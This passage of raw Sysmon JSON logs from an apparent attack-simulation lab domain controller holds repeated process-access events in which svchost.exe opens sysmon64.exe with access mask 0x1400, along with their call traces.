C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5018,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5019,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5020,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5021,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5022,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5023,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5024,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5025,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 